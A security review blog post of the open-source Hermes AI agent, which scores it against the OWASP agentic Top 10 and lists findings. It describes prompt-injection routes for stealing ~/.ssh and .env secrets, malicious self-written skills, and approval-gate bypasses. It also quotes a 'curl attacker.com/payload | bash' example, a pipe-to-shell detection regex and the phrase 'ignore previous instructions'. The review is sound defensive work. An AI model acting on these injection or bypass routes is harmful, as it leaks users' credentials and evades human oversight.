
Hermes Agent Technical Review: Safety via Transparency

Hermes is one of the most architecturally interesting AI agents I've reviewed this year. The maintainers chose a bold philosophy: "Safety via Transparency". But is transparency actually a safety control? I took it line by line through the OWASP Top 10 for Agentic Applications to find out.


Review Date: April 2026
Reviewer: TechDad
Scope: Open-source code and public documentation only. No systems accessed or exploited. All findings are for educational purposes.
Repository: https://github.com/nousresearch/hermes-agent


Executive Summary

The Hermes Agent exhibits a strong security posture out of the box. The architecture reflects a defense-in-depth approach, deploying guardrails specifically tailored against agentic vulnerabilities. Hermes emphasizes human-in-the-loop validation over complete isolation for operational capabilities.

Unlike agents that run entirely in isolated containers, Hermes gives its built-in tools direct system-level access to your machine. It protects your system with a human-in-the-loop approval gate for dangerous commands, rather than relying on a restrictive sandbox.

Things I Like

  • Full host access paired with a human-in-the-loop approval gate
  • Subagents properly leashed with zero persistent memory
  • Real supply chain paranoia — MCP server descriptions are actively scanned and injection strings flagged
  • Aggressive secret-redaction engine covering 35+ token prefixes
  • MAX_DEPTH = 2 hardcoded to kill runaway swarms

Things I Don’t Like

  • Silent approval bypass in batch/cron/non-interactive contexts
  • Display-only redaction — tokens still hit the LLM provider in plaintext
  • No private vulnerability reporting channel, despite SECURITY.md asking researchers to report privately
  • SECURITY.md “Out of Scope” section scopes real threats away rather than acknowledging them
  • Container backends with mounted host volumes bypass all approval checks

Bottom line: The code is genuinely more secure than the SECURITY.md suggests. The approval gate, redaction engine, subagent constraints, and supply-chain audits are well-implemented. The documentation is where the structural gap lives.


Architecture — “Safety via Transparency”

Most AI agents choose Safety via Inability — they lock the agent in a container where it can’t break anything, but consequently it can’t accomplish much either. Hermes chooses Safety via Transparency. It grants full system access but places a “human-in-the-loop” glass wall right in front of destructive executions.

Host-Level Default vs. Sandbox

  • Host-level Default: By default (terminal.backend: local), the agent’s core tools (terminal, read_file, write_file, patch) run directly on the host with the same permissions as the user who started the process. (Source: hermes_cli/config.py:377)
  • Approval vs. Sandbox: Hermes does not rely on sandboxes to protect the host machine from the agent’s built-in tools. It relies on an Approval Gate (tools/approval.py). When a command matches destructive patterns, the agent pauses and asks the operator for permission; a minimal sketch follows this list. (Source: tools/approval.py — DANGEROUS_PATTERNS and check_all_command_guards)
  • Where Sandboxes Are Used: The only default sandboxes are for LLM-written code (execute_code tool) and third-party MCP servers. (Source: tools/code_execution_tool.py)
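
To make the mechanism concrete, here is a minimal sketch of a regex-based approval gate. The shape is assumed from the description above — the real DANGEROUS_PATTERNS list in tools/approval.py is far larger, and the pipe-to-shell pattern is quoted verbatim from it later in this review:

import re

# Illustrative subset; the real list covers many more destructive patterns
# and is backed by an auxiliary-LLM "smart block" check.
DANGEROUS_PATTERNS = [
    (r"\brm\s+-rf\b", "recursive delete"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "pipe remote content to shell"),
    (r"\bchmod\s+777\b", "world-writable permissions"),
]

def requires_approval(command: str) -> str | None:
    """Return a human-readable reason if the command matches a dangerous pattern."""
    for pattern, description in DANGEROUS_PATTERNS:
        if re.search(pattern, command):
            return description
    return None

reason = requires_approval("curl https://example.com/install.sh | sh")
if reason is not None:
    answer = input(f"Command flagged ({reason}). Approve? [y/N] ")
    if answer.lower() != "y":
        raise PermissionError(f"Operator denied: {reason}")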

Agent Skills — Acquisition & Trust

  • Third-Party Skills (human-gated): Skills downloaded from the community marketplace (agentskills.io) require the /skills slash command. They pass through “Skills Guard” (security audit) and demand explicit confirmation. The agent has no tool to bypass this. (Source: hermes_cli/skills_hub.py, tools/skills_guard.py)
  • Self-Created Skills (agent-autonomous): The agent can write its own SKILL.md files into ~/.hermes/skills/ via file-writing tools. This is the “closed learning loop” — it writes what it learned so it remembers next time. (Source: tools/file_tools.py) ⚠️ This creates a trust asymmetry covered in F-06 below.

Capability Footprint

Because the architecture relies on an Approval Gate as its primary perimeter, Hermes retains massive capabilities:

  1. Unrestricted Native Access: Docker management, Python execution, git ops, infrastructure deploys — limited only by the operator’s shell permissions. (Source: tools/terminal_tool.py)
  2. Extensive Toolset & MCP Integration: 40+ native tools (browser, web research) plus hundreds of open-source MCP servers. Sandboxing is applied to the MCP server itself, not to the agent’s ability to query it. (Source: tools/mcp_tool.py:194 — _build_safe_env())
  3. Procedural Memory: The agent autonomously creates persistent SKILL.md workflows from host interactions.

Design Philosophy: Trust the Operator completely, but distrust code generated by the LLM and code pulled from the internet.


OWASP Top 10 for Agentic Applications — Scorecard

ID      Threat                               Result
ASI01   Agent Goal Hijack                    ✅ Strong Mitigation
ASI02   Tool Misuse                          ✅ Strong Mitigation
ASI03   Identity & Privilege Abuse           🟡 Moderate / Acceptable Risk
ASI04   Supply Chain Vulnerabilities         ✅ Advanced Mitigation
ASI05   Unexpected Code Execution (RCE)      ✅ Advanced Mitigation
ASI06   Memory & Context Poisoning           ✅ Strong Mitigation
ASI07   Insecure Inter-Agent Communication   ✅ Inherently Secure
ASI08   Cascading Failures                   ✅ Strong Mitigation
ASI09   Human-Agent Trust Exploitation       ✅ Advanced Mitigation
ASI10   Rogue Agents                         ✅ Strong Mitigation

ASI01 — Agent Goal Hijack

Threat: Attackers manipulate the agent’s core instructions to redirect its goal via prompt manipulation.

  • Subagents (tools/delegate_tool.py) are strictly sandboxed. Their system prompts are locked dynamically (_build_child_system_prompt) using the explicit delegation context, giving malicious inputs zero leverage over the parent’s core goal.
  • Subagents are denied access to sensitive toolsets. (Source: tools/delegate_tool.py:32 — DELEGATE_BLOCKED_TOOLS = frozenset(["delegate_task", "clarify", "memory", "send_message", "execute_code"]))

ASI02 — Tool Misuse

Threat: Functions manipulated for unintended system impacts.

  • Destructive operations require CLI / Gateway HITL validation. Arbitrary file wipes or configuration changes cannot execute automatically. (Source: tools/approval.py)
  • registry.py separates tools into discrete toolsets, enforcing least-privilege per role. (Source: tools/registry.py)

ASI03 — Identity and Privilege Abuse

Threat: Agent leveraged to impersonate users or escalate privileges.

  • Subagents inherit parent LLM credentials (api_key) but not full system access when restrictive toolsets are passed.
  • TerminalTool processes run as the host user. Hermes relies on env scoping (stripping dangerous keys for MCP servers) and the Approval Gate to prevent raw privilege escalation. (Source: tools/mcp_tool.py — _CREDENTIAL_PATTERN)

ASI04 — Supply Chain Vulnerabilities

Threat: External dependencies or model registries inject malicious behavior.

  • tools/mcp_tool.py includes _scan_mcp_description which parses external MCP server descriptions. (Source: tools/mcp_tool.py:253)
  • It actively detects and logs prompt injection strings (e.g., "ignore previous instructions", "<system>") from external supply chains.

ASI05 — Unexpected Code Execution (RCE)

Threat: Agent executes injected host-level commands.

  • tools/approval.py evaluates commands against DANGEROUS_PATTERNS regex heuristics (rm -rf, chmod 777, reverse shells).
  • tirith_security pipelines + a “smart block” auxiliary LLM catch obfuscated RCE attempts. (Source: tools/approval.py — _smart_approve())

ASI06 — Memory & Context Poisoning

Threat: Exploiting memory retrieval to inject biases or backdoor context.

  • Context traces in hermes_state.py (SQLite SessionDB) are rigidly partitioned by session_id, preventing cross-user bleed.
  • Subagents boot with skip_memory=True. (Source: tools/delegate_tool.py:366)

ASI07 — Insecure Inter-Agent Communication

Threat: Agent swarms coordinating over cleartext IPC, exposing them to man-in-the-middle attacks.

  • Inter-agent coordination runs exclusively via an in-memory ThreadPoolExecutor.
  • Responses return directly to the parent as string schemas. No network hops.

ASI08 — Cascading Failures

Threat: Agentic loops triggering DoS or massive API bills.

  • Hard caps universally enforced: subagent max_iterations, MCP auto-sampling max_tool_rounds (default 5). (Source: run_agent.py, tools/mcp_tool.py)

ASI09 — Human-Agent Trust Exploitation

Threat: Malicious commands masked in benign workflows to trick the user.

  • tools/approval.py enforces explicit consent paired with _smart_approve context — it explains why a command is risky, reducing blind approvals.

ASI10 — Rogue Agents

Threat: Agents operating independently outside lifecycle limits.

  • Swarm explosion neutralized via MAX_DEPTH = 2. A parent can spawn a child, but a child cannot spawn a grandchild. (Source: tools/delegate_tool.py:53)
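
A toy illustration of that depth guard. Only the constant is confirmed (tools/delegate_tool.py:53); the function shape and depth semantics are my assumption:

MAX_DEPTH = 2

def spawn_subagent(task: str, caller_depth: int) -> str:
    """caller_depth: 0 for the root agent, 1 for a child."""
    if caller_depth + 1 >= MAX_DEPTH:
        # A child (depth 1) asking for a grandchild (depth 2) is refused.
        raise RuntimeError(f"refusing to exceed MAX_DEPTH={MAX_DEPTH}")
    return f"subagent running at depth {caller_depth + 1}: {task!r}"

print(spawn_subagent("summarize logs", caller_depth=0))  # parent -> child: allowed
spawn_subagent("recurse deeper", caller_depth=1)         # child -> grandchild: raises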

Five Deliberate Security Boundaries

Beyond the OWASP standards, Hermes bakes five additional boundaries directly into its architecture.

1. “Display-Only” Secret Redaction (agent/redact.py)

A multi-layered redaction engine prevents accidental credential leaks.

  • Tool-output level: terminal_tool.py:1505, file_tools.py:390, code_execution_tool.py:862 call redact_sensitive_text() before results enter the LLM context or display.
  • Log level: All file/console loggers use RedactingFormatter (hermes_logging.py:226, gateway/run.py:9737) — secrets never reach log files.
  • Coverage: 35+ token prefixes (OpenAI, GitHub, Slack, AWS, Stripe, HuggingFace), env assignments, JSON fields, Authorization headers, JWTs, Telegram bot tokens, private key blocks, DB connection strings, Discord snowflake IDs, phone numbers. (Source: agent/redact.py:21-113 patterns; agent/redact.py:124 entry point)

⚠️ Caveat: See F-04 — the redactor operates at the display layer only. Underlying values still enter the LLM context.
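
For flavor, a minimal sketch of the prefix-matching layer of such a redactor — an illustrative subset only; the real agent/redact.py also handles env assignments, JSON fields, Authorization headers, JWTs, and private key blocks:

import re

# Well-known prefixes: OpenAI, GitHub, Slack, AWS, HuggingFace.
TOKEN_PREFIXES = ["sk-", "ghp_", "xoxb-", "AKIA", "hf_"]

_TOKEN_RE = re.compile(
    "(" + "|".join(re.escape(p) for p in TOKEN_PREFIXES) + r")[A-Za-z0-9_\-]{8,}"
)

def redact_sensitive_text(text: str) -> str:
    """Replace recognizable credentials with a placeholder before display/logging."""
    return _TOKEN_RE.sub(lambda m: m.group(1) + "[REDACTED]", text)

print(redact_sensitive_text("export OPENAI_API_KEY=sk-abc123def456ghi789"))
# -> export OPENAI_API_KEY=sk-[REDACTED]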

2. Sandboxed Python & Filtered Env Vars

When the agent writes its own Python scripts and runs them via execute_code, the child process strips all API keys and tokens. The env filter excludes anything containing KEY, TOKEN, SECRET, PASSWORD, CREDENTIAL, PASSWD, or AUTH. Only safe prefixes pass through (PATH, HOME, LANG, etc.). The script can only call tools via RPC over a Unix domain socket. (Source: tools/code_execution_tool.py:993-1022 — _SAFE_ENV_PREFIXES / _SECRET_SUBSTRINGS)

For third-party MCP servers, _build_safe_env() passes through only 8 baseline vars (PATH, HOME, USER, LANG, LC_ALL, TERM, SHELL, TMPDIR) plus XDG_*, preventing a malicious NPM/UV package from scraping ~/.hermes/.env. (Source: tools/mcp_tool.py:170-210)
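
A compact sketch of this two-sided filter. The substrings and prefixes come from the description above; the function shape is assumed, not the project's actual signature:

import os

_SAFE_ENV_PREFIXES = ("PATH", "HOME", "LANG", "LC_", "TERM", "SHELL", "TMPDIR", "XDG_")
_SECRET_SUBSTRINGS = ("KEY", "TOKEN", "SECRET", "PASSWORD", "CREDENTIAL", "PASSWD", "AUTH")

def build_safe_env(env: dict[str, str] | None = None) -> dict[str, str]:
    """Keep only allowlisted variables, then drop anything secret-shaped."""
    source = os.environ if env is None else env
    return {
        name: value
        for name, value in source.items()
        if name.upper().startswith(_SAFE_ENV_PREFIXES)
        and not any(s in name.upper() for s in _SECRET_SUBSTRINGS)
    }

child_env = build_safe_env()  # e.g. subprocess.Popen(cmd, env=child_env)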

3. Strict Subagent Leashing (tools/delegate_tool.py)

  • No access to persistent cross-session memory (skip_memory=True). (Source: tools/delegate_tool.py:366)
  • Delegation depth hardcoded to 2. (Source: tools/delegate_tool.py:53)
  • Delegation tool is removed from the child’s toolset. (Source: DELEGATE_BLOCKED_TOOLS)

4. Supply Chain Auto-Audits

The CI pipeline auto-blocks PRs containing common ML supply chain attack payloads — hidden .pth model weights, base64-wrapped exec() loaders. (Source: .github/workflows/supply-chain-audit.yml:38 — checks $BASE..$HEAD for /\.pth$/ and base64 decoders on Python startup)
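
The workflow itself is YAML; a rough Python rendering of its spirit (file extensions per the description above, everything else assumed) might look like:

import re
import subprocess
from pathlib import Path

def changed_files(base: str, head: str) -> list[str]:
    """Names of files touched between two git refs."""
    out = subprocess.run(
        ["git", "diff", "--name-only", f"{base}..{head}"],
        capture_output=True, text=True, check=True,
    )
    return out.stdout.splitlines()

# Crude heuristic for base64-wrapped exec() loaders; expect false positives.
LOADER_RE = re.compile(r"exec\s*\(.*base64|base64\.b64decode", re.IGNORECASE)

def audit(base: str, head: str) -> list[str]:
    findings = []
    for name in changed_files(base, head):
        if name.endswith(".pth"):
            # .pth files in site-packages can execute code at interpreter startup.
            findings.append(f"{name}: hidden .pth payload risk")
        elif name.endswith(".py") and Path(name).exists():
            if LOADER_RE.search(Path(name).read_text(errors="ignore")):
                findings.append(f"{name}: possible base64-wrapped exec() loader")
    return findings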

5. SSRF Protections (Tools + Gateway)

Hermes connects to 18+ external platforms (Slack, WhatsApp, Discord, etc.). Both the tool layer and gateway adapters enforce SSRF protections. is_safe_url() resolves hostnames and blocks:

  • Private, loopback, link-local, reserved, multicast, and CGNAT ranges
  • Cloud metadata hostnames (metadata.google.internal)
  • Fails closed on DNS errors or unexpected exceptions

(Source: tools/url_safety.py:51 defines is_safe_url(); called from tools/browser_tool.py:1332, tools/web_tools.py:1230,1553,1647, tools/vision_tools.py:100,159, and gateway adapters: gateway/platforms/base.py:390,509, telegram.py:1751, discord.py:1348, slack.py:651, mattermost.py:409, matrix.py:874, feishu.py:2450, wecom.py:1002, weixin.py:1598, qqbot.py:1021)
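
Based on that description, a fail-closed checker might look like the following sketch (behavioral outline only; the real implementation lives in tools/url_safety.py):

import ipaddress
import socket
from urllib.parse import urlparse

BLOCKED_HOSTNAMES = {"metadata.google.internal"}

def is_safe_url(url: str) -> bool:
    """Resolve the host and reject anything pointing at internal address space."""
    try:
        host = urlparse(url).hostname
        if not host or host in BLOCKED_HOSTNAMES:
            return False
        for info in socket.getaddrinfo(host, None):
            ip = ipaddress.ip_address(info[4][0])
            if (ip.is_private or ip.is_loopback or ip.is_link_local
                    or ip.is_reserved or ip.is_multicast
                    or ip in ipaddress.ip_network("100.64.0.0/10")):  # CGNAT
                return False
        return True
    except Exception:
        return False  # fail closed on DNS errors or anything unexpected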


Residual Risks & Structural Gaps

ID     Title                                                      Severity        Category
F-01   SECURITY.md exclusions dismiss valid attack vectors        Informational   Governance
F-02   Silent approval bypass in non-interactive contexts         Medium          Authorization
F-03   Container backends bypass approval with mounted volumes    Low             Authorization
F-04   Redaction is display-only; secrets sent to LLM providers   Medium          Data Leakage
F-05   Permanent allowlist approves entire pattern categories     Low             Authorization
F-06   Self-created skills bypass Skills Guard audit              Informational   Trust Model
F-07   Fragmented security reporting guidelines and missing SLA   Informational   Governance

F-01: SECURITY.md “Out of Scope” Contains Self-Serving Exclusions

Severity: Informational / Governance Risk
Location: SECURITY.md:50-58 (Section 3: “Out of Scope”)

The “Out of Scope” section preemptively dismisses several categories of findings legitimate researchers would consider valid. Several exclusions cross from “reasonable scoping” into “redefining risk away.”

F-01a: Prompt Injection Dismissed Unless It Bypasses Approval Gate

“Prompt Injection: Unless it results in a concrete bypass of the approval system, toolset restrictions, or container sandbox.” — SECURITY.md:53

This sets an unreasonably high bar. A prompt injection that convinces the agent to:

  • Exfiltrate ~/.hermes/memory/MEMORY.md contents into its response (sent to a third-party LLM API)
  • Read and summarize ~/.hermes/.env contents in natural language (bypassing regex redaction)
  • Use read_file to access ~/.ssh/id_rsa and encode it in a way the redactor doesn’t catch

…would not qualify under this definition, because none bypass the approval system. The approval gate governs terminal commands, not read_file or the agent’s own responses.

Impact: Data exfiltration via prompt injection is a real attack vector explicitly excluded.

F-01b: “Default Behavior Is Not a Vulnerability”

“Host-level command execution when terminal.backend is set to local — this is the documented default, not a vulnerability.” — SECURITY.md:56

This conflates “intentional” with “secure.” Documenting a risk does not eliminate the risk. A researcher demonstrating the agent running curl attacker.com/payload | bash through a crafted prompt would be told “that’s by design” — even though the dangerous pattern for this exact case exists at tools/approval.py:98:

(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b', "pipe remote content to shell"),

The approval gate should catch this, but the documentation preemptively absolves the project even if it doesn’t.

F-01c: Tool-Level Access Restrictions Waved Away

“Reports that a specific tool (e.g., read_file) can access a resource are not vulnerabilities if the same access is available through terminal.” — SECURITY.md:58

This is a “weakest link” argument in reverse. Instead of “we should apply consistent restrictions across all access paths,” it says “since terminal is wide open, nothing else matters.” This dismisses defense-in-depth entirely.

F-01d: Break-Glass Settings Pre-Absolved

“Intentional break-glass settings such as approvals.mode: "off" or terminal.backend: local in production.” — SECURITY.md:57

terminal.backend: local is the default (hermes_cli/config.py:377), not a break-glass setting. Listing it alongside approvals.mode: "off" conflates two very different risk levels. A first-time user who never touches config.yaml is running in local mode — that’s not a conscious break-glass decision.

F-02: Silent Approval Bypass in Non-Interactive Contexts

Severity: Medium
Location: tools/approval.py:619-622

if not is_cli and not is_gateway:
    return {"approved": True, "message": None}

When the agent runs outside both CLI (HERMES_INTERACTIVE unset) and gateway (HERMES_GATEWAY_SESSION unset) contexts, all dangerous command checks are silently bypassed. This affects:

  • batch_runner.py (parallel batch processing)
  • environments/ (RL training / Atropos)
  • Any programmatic AIAgent usage that doesn’t set the env vars
  • Cron jobs (cron/scheduler.py)

Impact: An attacker who can influence prompts in batch or cron contexts can execute arbitrary destructive commands with zero approval. The same bypass exists in check_all_command_guards() at tools/approval.py:719-720.

Recommendation: Non-interactive contexts should default to deny for dangerous commands, not silent approval. Users wanting unguarded batch execution can opt in via approvals.mode: off.
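
A hedged sketch of what that default-deny could look like (the function and parameter names are mine, not the project's):

def gate_non_interactive(is_cli: bool, is_gateway: bool, is_dangerous: bool,
                         approvals_mode: str) -> dict | None:
    """Decide for non-interactive contexts; None defers to the normal prompt flow."""
    if is_cli or is_gateway:
        return None  # interactive: the usual approval prompt handles it
    if approvals_mode == "off":
        return {"approved": True, "message": None}  # explicit operator opt-in
    if is_dangerous:
        # Replaces today's silent {"approved": True} bypass.
        return {"approved": False,
                "message": "dangerous command denied in non-interactive context"}
    return {"approved": True, "message": None}  # benign commands still run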

F-03: Container Backends Bypass All Approval Checks

Severity: Low (Intentional Design, Undocumented Assumption)
Location: tools/approval.py:602-603 and 704-705

if env_type in ("docker", "singularity", "modal", "daytona"):
    return {"approved": True, "message": None}

When using container backends, the approval gate is completely disabled — the agent can run rm -rf / or DROP DATABASE without prompting.

The implicit assumption: “the container is disposable.” That holds for ephemeral containers, but not for containers with:

  • Mounted host volumes (terminal.docker_volumes, terminal.docker_mount_cwd_to_workspace)
  • Persistent filesystems (terminal.container_persistent: True — the default)

(SSH backends, by contrast, are correctly NOT bypassed — env_type == "ssh" is excluded.)

A docker_volumes: ["/home/user/projects:/workspace"] mount + a destructive in-container command would delete real host files with zero approval.

Recommendation: If docker_volumes is non-empty or docker_mount_cwd_to_workspace is true, downgrade the container bypass to a warning.
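
In code, the downgrade could be as simple as the following sketch (config field names are taken from the review text; the function itself is hypothetical):

def container_bypass_allowed(env_type: str, docker_volumes: list[str],
                             mount_cwd_to_workspace: bool) -> bool:
    """Only skip the approval gate for containers that cannot touch host data."""
    if env_type not in ("docker", "singularity", "modal", "daytona"):
        return False  # host and SSH backends always keep the gate
    if docker_volumes or mount_cwd_to_workspace:
        # Host files are reachable from inside the container: keep the gate
        # on (or at minimum emit a loud warning) instead of bypassing it.
        return False
    return True  # purely ephemeral container: bypass is defensible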

F-04: Redaction Layer Operates on Display Only — Not on LLM Context

Severity: Medium
Location: agent/redact.py (as documented in SECURITY.md:34)

“Redaction operates on the display layer only — underlying values remain intact for internal agent operations.”

SECURITY.md states this correctly but doesn’t address the implication: secrets passing through the agent’s conversation context are sent to the LLM provider in plaintext. If the agent reads ~/.hermes/.env via read_file or terminal cat ~/.hermes/.env, the full contents (API keys, tokens) are:

  1. Stored in the messages table of state.db (unencrypted SQLite)
  2. Sent to the LLM provider API in the next request
  3. Potentially logged by the provider

The redaction layer hides secrets from the human on their screen, but doesn’t prevent the secrets from leaving the machine. This is a data exfiltration path — not via a network attacker, but via the LLM provider itself.

Recommendation: Tool-level input redaction (before content enters message history) for known secret paths: ~/.hermes/.env, ~/.ssh/*, ~/.aws/credentials.
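
One possible shape for that input-side redaction, as a sketch (the path list comes from the recommendation above; the helper names are invented):

from pathlib import Path

SENSITIVE_GLOBS = ["~/.hermes/.env", "~/.ssh/*", "~/.aws/credentials"]

def is_sensitive_path(path: str) -> bool:
    """True if the path matches a known secret location."""
    p = Path(path).expanduser().resolve()
    for entry in SENSITIVE_GLOBS:
        anchor = Path(entry).expanduser()
        if "*" in entry:
            if p.parent == anchor.parent:  # anything directly under ~/.ssh/
                return True
        elif p == anchor.resolve():
            return True
    return False

def read_file_for_context(path: str) -> str:
    """Redact before content enters message history, not at display time."""
    if is_sensitive_path(path):
        return f"[contents of {path} withheld from LLM context]"
    return Path(path).expanduser().read_text()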

F-05: command_allowlist Enables Permanent Approval Bypass Persistence

Severity: Low
Location: tools/approval.py:360-368, hermes_cli/config.py:735

When a user approves a dangerous command with [a]lways, the pattern key is saved to config.yaml under command_allowlist. This is loaded at module import (tools/approval.py:957) and persists across sessions, profiles, and reboots.

The command_allowlist stores human-readable description strings (e.g., "recursive delete", "shell command via -c/-lc flag"), not specific commands. Approving bash -c "echo hello" once with [a]lways permanently approves all commands matching the "shell command via -c/-lc flag" pattern — including bash -c "rm -rf /".

Evidence:

# tools/approval.py:196-197
pattern_key = description  # e.g., "shell command via -c/-lc flag"
return (True, pattern_key, description)

Recommendation: The [a]lways prompt should warn it approves an entire category of commands. Consider storing command-specific hashes instead of pattern keys.
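
A sketch of the hash-based alternative (storage shape assumed; today the project persists pattern description strings):

import hashlib

def allowlist_key(command: str) -> str:
    """Hash the exact command so [a]lways only re-approves this command."""
    return hashlib.sha256(command.strip().encode()).hexdigest()

allowlist: set[str] = set()

def remember_approval(command: str) -> None:
    allowlist.add(allowlist_key(command))

def previously_approved(command: str) -> bool:
    return allowlist_key(command) in allowlist

remember_approval('bash -c "echo hello"')
assert previously_approved('bash -c "echo hello"')
assert not previously_approved('bash -c "rm -rf /"')  # no category-wide bypass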

F-06: Self-Created Skills Have Equivalent Trust to Installed Skills

Severity: Informational
Location: tools/skills_tool.py, agent/skill_commands.py

Skills the agent creates autonomously (via write_file to ~/.hermes/skills/) receive the same trust level as skills the human explicitly installed via the Skills Hub with Skills Guard audit. There is no distinction in the loading path — all SKILL.md files under ~/.hermes/skills/ are loaded equally.

If the agent is manipulated via prompt injection to create a malicious skill (e.g., containing instructions to exfiltrate data on every future session), that skill loads in all subsequent conversations without audit or user awareness. Skills Guard only runs during /skills install, not during write_file to the skills directory.

Recommendation: A “self-created” flag in skill frontmatter that triggers a one-time confirmation prompt when the skill is first loaded in a new session.
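
A sketch of how that flag could gate loading (the self_created frontmatter field is my invention for illustration, not an existing Hermes convention):

import yaml  # third-party: PyYAML

def needs_first_load_confirmation(skill_md: str, confirmed: set[str]) -> bool:
    """Self-created skills trigger a one-time confirmation on first load."""
    if not skill_md.startswith("---"):
        return False  # no frontmatter: treat as human-authored legacy skill
    frontmatter = yaml.safe_load(skill_md.split("---")[1]) or {}
    name = str(frontmatter.get("name", ""))
    return bool(frontmatter.get("self_created")) and name not in confirmed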

F-07: Fragmented Security Reporting Guidelines and Missing SLA

Severity: Informational / Governance Risk
Location: CONTRIBUTING.md:646, SECURITY.md:80-85

  1. Disconnected Guidelines: CONTRIBUTING.md instructs users to “report privately” for security vulnerabilities but gives no instructions on how to do so and does not link to SECURITY.md. A contributor looking only at CONTRIBUTING.md has no actionable path.
  2. Missing SLA: SECURITY.md defines a 90-day Coordinated Vulnerability Disclosure window before publication but lacks an initial-response SLA (e.g., “We will acknowledge receipt within 72 hours”). Without an SLA, researchers may assume their reports were ignored and publish early out of frustration.

Recommendation: Update CONTRIBUTING.md to link SECURITY.md. Add a 48–72 hour initial-response SLA to the Disclosure Process.


Issue Tracker Signals

A fair amount of signal can be derived just by looking at the public issue tracker.

  • ~1,700+ open issues against a fast-moving project — triage is fundamentally losing the battle against shipping velocity.
  • 9 releases in 5 weeks — the maintainers are shipping hard while carrying a massive capability footprint.
  • Issue #11430 — per-user memory isolation in group chats: complicates the strong claim of session-level sandboxing (see ASI06). Group-chat scenarios are a legitimate multi-tenant-like context the current partitioning model wasn’t designed for.
  • Issue #11431 — oversized toolsets drag subagents to a crawl: creates unintentional denial-of-service loops inside the delegation subsystem. Worth watching as a soft-cap analogue to ASI08.

None of these are individually damning, but they do indicate that the gap between documented security posture and lived operational reality is widening.

Issue numbers and counts are approximate as of the review date and will drift. Readers should consult the live tracker.


Repository Hygiene (Non-Security)

Strictly non-security, but worth flagging for contributors:

  • The repo has ~14 loose Python files sitting directly at the repo root, making it hard to parse the project boundary at first glance.
  • Nothing is fundamentally broken. The repository has grown organically. Modules inside tools/, agent/, and gateway/ have very clear responsibilities.
  • A ~30-minute hygiene pass would materially lower onboarding cost for new contributors:
    • Move loose Python scripts into a proper package
    • Consolidate to a single packaging canon (pyproject.toml as the single source of truth)

What I Would Tighten

Concrete, prioritized recommendations:

  1. Non-interactive contexts must default to deny. Change F-02’s silent bypass to an explicit deny. Let operators opt into unguarded batch via approvals.mode: off.
  2. Scrub secrets before they hit the database. Tool-level input redaction for known-sensitive paths (~/.hermes/.env, ~/.ssh/*, ~/.aws/credentials) to close F-04’s provider-logging exfiltration path.
  3. Auxiliary-LLM “intent capsule” re-validation. Periodically re-assert the current command stack against the original system prompt payload (strengthens ASI01/ASI03).
  4. Warn on [a]lways approvals. Make it crystal clear when an approval covers an entire regex category, not just the visible command (F-05).
  5. Flag self-created skills at first load. A one-time confirmation prompt when a freshly-authored skill is loaded into a new session (F-06).
  6. Private vulnerability reporting channel. A real security email or PGP key with a 48–72 hour acknowledgement SLA (F-07).
  7. Honest SECURITY.md scoping. Replace “Out of Scope” exclusions with acknowledged residual risks. The code is strong enough to stand on that honesty.

Final Verdict

The Hermes Agent proves that Safety via Transparency is a viable architecture. The approval gate, redaction engine, subagent constraints, and supply-chain audits are genuinely well-implemented. This is a masterclass in modern AI agent engineering.

It just deserves to have the residual risks acknowledged in documentation, not scoped away.
